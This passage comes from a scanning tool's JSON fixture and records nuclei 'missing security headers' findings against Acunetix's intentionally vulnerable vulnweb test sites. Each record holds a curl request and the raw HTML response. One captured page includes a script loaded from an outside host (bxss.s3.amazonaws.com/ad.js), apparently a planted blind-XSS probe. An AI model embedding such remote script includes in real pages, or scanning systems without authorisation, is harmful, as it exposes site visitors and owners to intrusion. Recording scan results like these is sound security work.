testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 AVG/123.0.0.0\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=utf-8\r\nDate: Wed, 13 Nov 2024 02:40:49 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE html>\n<html lang="en" xmlns="http://www.w3.org/1999/html" data-ng-app="itemsApp">\n<head>\n <meta charset="utf-8">\n <title>SecurityTweets</title>\n <meta name="viewport" content="width=device-width, initial-scale=1.0">\n <meta name="description" content="">\n <meta name="author" content="">\n\n <!-- Le styles -->\n <link href="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css" rel="stylesheet">\n <!--<link href="http://netdna.bootstrapcdn.com/font-awesome/3.0.2/css/font-awesome.css" rel="stylesheet">-->\n <link href='http://fonts.googleapis.com/css?family=Open+Sans:700' rel='stylesheet' type='text/css'>\n <link href="/static/css/style.css" rel="stylesheet">\n <style type="text/css">\n body {\n padding-top: 60px;\n padding-bottom: 40px;\n }\n .sidebar-nav {\n padding: 9px 0;\n }\n\n @media (max-width: 980px) {\n /* Enable use of floated navbar text */\n .navbar-text.pull-right {\n float: none;\n padding-left: 5px;\n padding-right: 5px;\n }\n }\n </style>\n</head>\n\n<body>\n\n<div class="navbar navbar-fixed-top">\n <div class="navbar-inner">\n <div class="container-fluid">\n <button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse">\n <span class="icon-bar"></span>\n <span class="icon-bar"></span>\n <span class="icon-bar"></span>\n </button>\n <a class="brand" href="https://www.acunetix.com/"><img src="/static/img/logo2.png" alt="Acunetix website security">&nbsp;&nbsp;&nbsp;&nbsp;</a>\n <p class="navbar-text pull-left">\n HTML5 test website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a>.\n </p>\n </div>\n </div>\n</div>\n\n<div class="container-fluid">\n <div class="row-fluid">\n <div class="span2">\n <div class="well sidebar-nav">\n <ul class="nav nav-list">\n <li class="nav-header">Action</li>\n <li class="active"><a href="#/response">Response</a></li>\n\n <li class="nav-header">Acunetix</li>\n <li><a target="_blank" href="http://www.acunetix.com/">Website</a></li>\n\t\t\t\t\t<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/html5-website-security/">HTML5 scanner</a></li>\n\t\t\t\t\t<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/">HTML5 vuln help</a></li>\n <li><a target="_blank" href="http://www.acunetix.com/blog/">Blog</a></li>\n <li><a target="_blank" href="http://www.facebook.com/Acunetix">Facebook</a></li>\n <li><a target="_blank" href="http://www.twitter.com/acunetix/">Twitter</a></li>\n </ul>\n </div><!--/.well -->\n </div><!--/span-->\n <div class="span10">\n <div class="row-fluid">\n \n Your report was submitted, thanks. <!-- invalid -->\n \n </div><!--/row-->\n </div><!--/span-->\n </div><!--/row-->\n\n <hr>\n\t\n\t<div style="background-color:lightgray;width:100%;text-align:center;font-size:14px">\n\t\t<p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.</p>\n\t</div>\n\n <footer>\n <p>&copy; Acunetix Ltd. 2019</p>\n </footer>\n\n</div><!--/.fluid-container-->\n\n<!-- Le javascript\n================================================== -->\n<!-- Placed at the end of the document so the pages load faster -->\n<script src="http://code.jquery.com/jquery-1.9.1.min.js"></script>\n<script src="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js"></script>\n<script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js"></script>\n<script src="/static/app/app.js"></script>\n\n</body>\n</html>", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 539, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 75, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "x-permitted-cross-domain-policies", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.1 Safari/605.1.15' 'http://testasp.vulnweb.com/%E2%80%93'", + "type": "http", + "http_url": "http://testasp.vulnweb.com/%E2%80%93", + "discovered_date": "2024-11-13T02:41:21.094Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /%E2%80%93 HTTP/1.1\r\nHost: testasp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.1 Safari/605.1.15\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 404 Not Found\r\nConnection: close\r\nContent-Length: 1245\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:40:45 GMT\r\nServer: Microsoft-IIS/8.5\r\nX-Powered-By: ASP.NET\r\n\r\n<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">\r\n<html xmlns="http://www.w3.org/1999/xhtml">\r\n<head>\r\n<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>\r\n<title>404 - File or directory not found.</title>\r\n<style type="text/css">\r\n<!--\r\nbody{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}\r\nfieldset{padding:0 15px 10px 15px;} \r\nh1{font-size:2.4em;margin:0;color:#FFF;}\r\nh2{font-size:1.7em;margin:0;color:#CC0000;} \r\nh3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} \r\n#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;\r\nbackground-color:#555555;}\r\n#content{margin:0 0 0 2%;position:relative;}\r\n.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}\r\n-->\r\n</style>\r\n</head>\r\n<body>\r\n<div id="header"><h1>Server Error</h1></div>\r\n<div id="content">\r\n <div class="content-container"><fieldset>\r\n <h2>404 - File or directory not found.</h2>\r\n <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3>\r\n </fieldset></div>\r\n</div>\r\n</body>\r\n</html>\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 540, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "x-content-type-options", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/604.5.2 (KHTML, like Gecko) Version/9.1.2 Safari/604.5.2' 'http://testphp.vulnweb.com/.idea/.name'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/.idea/.name", + "discovered_date": "2024-11-13T02:41:21.230Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /.idea/.name HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/604.5.2 (KHTML, like Gecko) Version/9.1.2 Safari/604.5.2\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 6\r\nAccept-Ranges: bytes\r\nContent-Type: application/octet-stream\r\nDate: Wed, 13 Nov 2024 02:40:49 GMT\r\nEtag: "4f911cd6-6"\r\nLast-Modified: Fri, 20 Apr 2012 08:22:46 GMT\r\nServer: nginx/1.19.0\r\n\r\nacuart", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 541, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "permissions-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 Edg/84.0.522.52' 'http://testphp.vulnweb.com/CVS/Entries'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/CVS/Entries", + "discovered_date": "2024-11-13T02:41:21.366Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /CVS/Entries HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 Edg/84.0.522.52\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 1\r\nAccept-Ranges: bytes\r\nContent-Type: application/octet-stream\r\nDate: Wed, 13 Nov 2024 02:40:49 GMT\r\nEtag: "4dca64a4-1"\r\nLast-Modified: Wed, 11 May 2011 10:27:48 GMT\r\nServer: nginx/1.19.0\r\n\r\n ", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 542, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "x-permitted-cross-domain-policies", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; en-US; rv:122.0esr) Gecko/20100209 Firefox/122.0esr' 'http://testphp.vulnweb.com'", + "type": "http", + "http_url": "http://testphp.vulnweb.com", + "discovered_date": "2024-11-13T02:41:21.510Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET / HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; en-US; rv:122.0esr) Gecko/20100209 Firefox/122.0esr\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:40:49 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"\n"http://www.w3.org/TR/html4/loose.dtd">\n<html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideHTMLIsLocked="false" -->\n<head>\n<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2">\n\n<!-- InstanceBeginEditable name="document_title_rgn" -->\n<title>Home of Acunetix Art</title>\n<!-- InstanceEndEditable -->\n<link rel="stylesheet" href="style.css" type="text/css">\n<!-- InstanceBeginEditable name="headers_rgn" -->\n<!-- here goes headers headers -->\n<!-- InstanceEndEditable -->\n<script language="JavaScript" type="text/JavaScript">\n<!--\nfunction MM_reloadPage(init) { //reloads the window if Nav4 resized\n if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) {\n document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }}\n else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload();\n}\nMM_reloadPage(true);\n//-->\n</script>\n\n</head>\n<body> \n<div id="mainLayer" style="position:absolute; width:700px; z-index:1">\n<div id="masthead"> \n <h1 id="siteName"><a href="https://www.acunetix.com/"><img src="images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></h1> \n <h6 id="siteInfo">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></h6>\n <div id="globalNav"> \n \t<table border="0" cellpadding="0" cellspacing="0" width="100%"><tr>\n\t<td align="left">\n\t\t<a href="index.php">home</a> | <a href="categories.php">categories</a> | <a href="artists.php">artists\n\t\t</a> | <a href="disclaimer.php">disclaimer</a> | <a href="cart.php">your cart</a> | \n\t\t<a href="guestbook.php">guestbook</a> | \n\t\t<a href="AJAX/index.php">AJAX Demo</a>\n\t</td>\n\t<td align="right">\n\t\t</td>\n\t</tr></table>\n </div> \n</div> \n<!-- end masthead --> \n\n<!-- begin content -->\n<!-- InstanceBeginEditable name="content_rgn" -->\n<div id="content">\n\t<h2 id="pageName">welcome to our page</h2>\n\t <div class="story">\n\t\t<h3>Test site for Acunetix WVS.</h3>\n\t </div>\n</div>\n<!-- InstanceEndEditable -->\n<!--end content -->\n\n<div id="navBar"> \n <div id="search"> \n <form action="search.php?test=query" method="post"> \n <label>search art</label> \n <input name="searchFor" type="text" size="10"> \n <input name="goButton" type="submit" value="go"> \n </form> \n </div> \n <div id="sectionLinks"> \n <ul> \n <li><a href="categories.php">Browse categories</a></li> \n <li><a href="artists.php">Browse artists</a></li> \n <li><a href="cart.php">Your cart</a></li> \n <li><a href="login.php">Signup</a></li>\n\t <li><a href="userinfo.php">Your profile</a></li>\n\t <li><a href="guestbook.php">Our guestbook</a></li>\n\t\t<li><a href="AJAX/index.php">AJAX Demo</a></li>\n\t </li> \n </ul> \n </div> \n <div class="relatedLinks"> \n <h3>Links</h3> \n <ul> \n <li><a href="http://www.acunetix.com">Security art</a></li> \n\t <li><a href="https://www.acunetix.com/vulnerability-scanner/php-security-scanner/">PHP scanner</a></li>\n\t <li><a href="https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/">PHP vuln help</a></li>\n\t <li><a href="http://www.eclectasy.com/Fractal-Explorer/index.html">Fractal Explorer</a></li> \n </ul> \n </div> \n <div id="advert"> \n <p>\n <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="107" height="66">\n <param name="movie" value="Flash/add.swf">\n <param name=quality value=high>\n <embed src="Flash/add.swf" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="107" height="66"></embed>\n </object>\n </p>\n </div> \n</div> \n\n<!--end navbar --> \n<div id="siteInfo"> <a href="http://www.acunetix.com">About Us</a> | <a href="privacy.php">Privacy Policy</a> | <a href="mailto:wvs@acunetix.com">Contact Us</a> | <a href="/Mod_Rewrite_Shop/">Shop</a> | <a href="/hpp/">HTTP Parameter Pollution</a> | &copy;2019\n Acunetix Ltd \n</div> \n \n \n<br> \n<div style="background-color:lightgray;width:100%;text-align:center;font-size:12px;padding:1px">\n<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a real shop. This is an example PHP application, which is intentionally vulnerable to web attacks. It is intended to help you test Acunetix. It also helps you understand how developer errors and bad configuration may let someone break into your website. You can use it to test other tools and your manual hacking skills as well. Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.</p>\n</div>\n</div>\n</body>\n<!-- InstanceEnd --></html>\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 543, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "referrer-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 XTPT/1.0' 'http://testphp.vulnweb.com/.idea'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/.idea", + "discovered_date": "2024-11-13T02:41:21.652Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /.idea HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 XTPT/1.0\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:40:51 GMT\r\nServer: nginx/1.19.0\r\n\r\n<html>\r\n<head><title>Index of /.idea/</title></head>\r\n<body>\r\n<h1>Index of /.idea/</h1><hr><pre><a href="../">../</a>\r\n<a href="scopes/">scopes/</a> 13-Nov-2012 13:29 -\r\n<a href="acuart.iml">acuart.iml</a> 20-Apr-2012 08:22 292\r\n<a href="encodings.xml">encodings.xml</a> 20-Apr-2012 08:22 171\r\n<a href="misc.xml">misc.xml</a> 20-Apr-2012 08:22 266\r\n<a href="modules.xml">modules.xml</a> 20-Apr-2012 08:22 275\r\n<a href="vcs.xml">vcs.xml</a> 20-Apr-2012 08:22 173\r\n<a href="workspace.xml">workspace.xml</a> 20-Apr-2012 08:23 12473\r\n</pre><hr></body>\r\n</html>\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 544, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "referrer-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.2 Safari/605.1.15' 'http://testhtml5.vulnweb.com/static/css'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com/static/css", + "discovered_date": "2024-11-13T02:41:21.794Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /static/css HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.2 Safari/605.1.15\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 403 Forbidden\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:40:49 GMT\r\nServer: nginx/1.19.0\r\n\r\n<html>\r\n<head><title>403 Forbidden</title></head>\r\n<body>\r\n<center><h1>403 Forbidden</h1></center>\r\n<hr><center>nginx/1.19.0</center>\r\n</body>\r\n</html>\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 545, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "strict-transport-security", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.61' 'http://testhtml5.vulnweb.com/logout'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com", + "discovered_date": "2024-11-13T02:41:21.932Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /logout HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.61\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nAccess-Control-Allow-Origin: *\r\nContent-Type: text/html; charset=utf-8\r\nDate: Wed, 13 Nov 2024 02:40:50 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE html>\n<html lang="en" xmlns="http://www.w3.org/1999/html" data-ng-app="itemsApp">\n<head>\n <meta charset="utf-8">\n <title>SecurityTweets - HTML5 test website for Acunetix Web Vulnerability Scanner</title>\n <meta name="viewport" content="width=device-width, initial-scale=1.0">\n <meta name="description" content="">\n <meta name="author" content="">\n\n <!-- Le styles -->\n <link href="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css" rel="stylesheet">\n <link href='http://fonts.googleapis.com/css?family=Lora:400,700,400italic,700italic' rel='stylesheet' type='text/css'>\n <link href="/static/css/style.css" rel="stylesheet">\n\n <link rel="icon" type="image/png" href="http://www.acunetix.com/favicon.ico">\n\n <style type="text/css">\n body {\n padding-top: 60px;\n padding-bottom: 40px;\n }\n .sidebar-nav {\n padding: 9px 0;\n }\n\n @media (max-width: 980px) {\n /* Enable use of floated navbar text */\n .navbar-text.pull-right {\n float: none;\n padding-left: 5px;\n padding-right: 5px;\n }\n }\n </style>\n</head>\n\n<body>\n\n<div class="navbar navbar-fixed-top">\n <div class="navbar-inner">\n <div class="container-fluid">\n <button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse">\n <span class="icon-bar"></span>\n <span class="icon-bar"></span>\n <span class="icon-bar"></span>\n </button>\n <a class="brand" href="https://www.acunetix.com/"><img src="/static/img/logo2.png" alt="Acunetix website security">&nbsp;&nbsp;&nbsp;&nbsp;</a>\n <p class="navbar-text pull-left">\n Vulnerable HTML5 test website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a>.\n </p>\n\n <p class="navbar-text pull-right">\n \n <a href="#myModal" role="button" class="btn" data-toggle="modal">Login</a>\n \n </p>\n </div>\n </div>\n</div>\n\n<div class="container-fluid">\n <div class="row-fluid">\n <div class="span2">\n <div class="well sidebar-nav">\n <ul class="nav nav-list">\n <li class="nav-header">Views</li>\n <li id="popularLi" class="active"><a href="#/popular">Popular</a></li>\n <li><a href="#/latest">Latest</a></li>\n <li><a href="#/carousel">Carousel</a></li>\n <li><a href="#/archive">Archive</a></li>\n\n <li class="nav-header">Website</li>\n <li><a href="#/about">About</a></li>\n <li><a href="#/contact">Contact</a></li>\n\n <li class="nav-header">Acunetix</li>\n <li><a target="_blank" href="http://www.acunetix.com/">Website</a></li>\n\t\t\t\t\t<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/html5-website-security/">HTML5 scanner</a></li>\n\t\t\t\t\t<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/">HTML5 vuln help</a></li>\n <li><a target="_blank" href="http://www.acunetix.com/blog/">Blog</a></li>\n <li><a target="_blank" href="http://www.facebook.com/Acunetix">Facebook</a></li>\n <li><a target="_blank" href="http://www.twitter.com/acunetix/">Twitter</a></li>\n </ul>\n </div><!--/.well -->\n </div><!--/span-->\n <div class="span10">\n <div class="row-fluid">\n <div ng-view></div>\n </div><!--/row-->\n </div><!--/span-->\n </div><!--/row-->\n\n <hr>\n\n <div class="row-fluid">\n <div class="pull-left" style="font-size: xx-small;" id="refId"></div>\n </div>\n\t\n\t<div style="background-color:lightgray;width:100%;text-align:center;font-size:14px">\n\t\t<p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.</p>\n\t</div>\n\n <footer>\n <p class="pull-left">&copy; Acunetix Ltd. 2019</p>\n </footer>\n\n</div><!--/.fluid-container-->\n\n\n<!-- Modal -->\n<div id="myModal" class="modal hide fade" tabindex="-1" role="dialog" aria-labelledby="myModalLabel" aria-hidden="true">\n <form class="modal-body" action="/login" method="POST" id="loginForm">\n <div class="modal-header">\n <button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button>\n <h3 id="myModalLabel">Login</h3>\n </div>\n <div class="modal-body">\n <div class="control-group">\n <!-- Username -->\n <label class="control-label" for="username">Username</label>\n <div class="controls">\n <input type="text" id="username" name="username" placeholder="" class="input-xlarge" value="admin">\n </div>\n </div>\n\n <div class="control-group">\n <!-- Password-->\n <label class="control-label" for="password">Password</label>\n <div class="controls">\n <input type="password" id="password" name="password" placeholder="" class="input-xlarge">\n </div>\n </div>\n\n <div class="control-group">\n <a href="#" class="btn" id="loginFormForgot">Forgot Pwd?</a>\n </div>\n\n </div>\n <div class="modal-footer">\n <button class="btn btn-primary" id="loginFormSubmit">Login</button>\n <button class="btn" data-dismiss="modal" aria-hidden="true">Close</button>\n </div>\n </form>\n</div>\n\n<!-- Le javascript\n================================================== -->\n<!-- Placed at the end of the document so the pages load faster -->\n<script src="http://code.jquery.com/jquery-1.9.1.min.js"></script>\n<script src="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js"></script>\n<script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js"></script>\n\n<!-- App libs -->\n\n<script src="/static/app/app.js"></script>\n<script src="/static/app/libs/sessvars.js"></script>\n<script src="/static/app/post.js"></script>\n<script src="/static/app/controllers/controllers.js"></script>\n<script src="/static/app/services/itemsService.js"></script>\n<script src="http://bxss.s3.amazonaws.com/ad.js"></script>\n\n\n</body>\n</html>", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 546, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 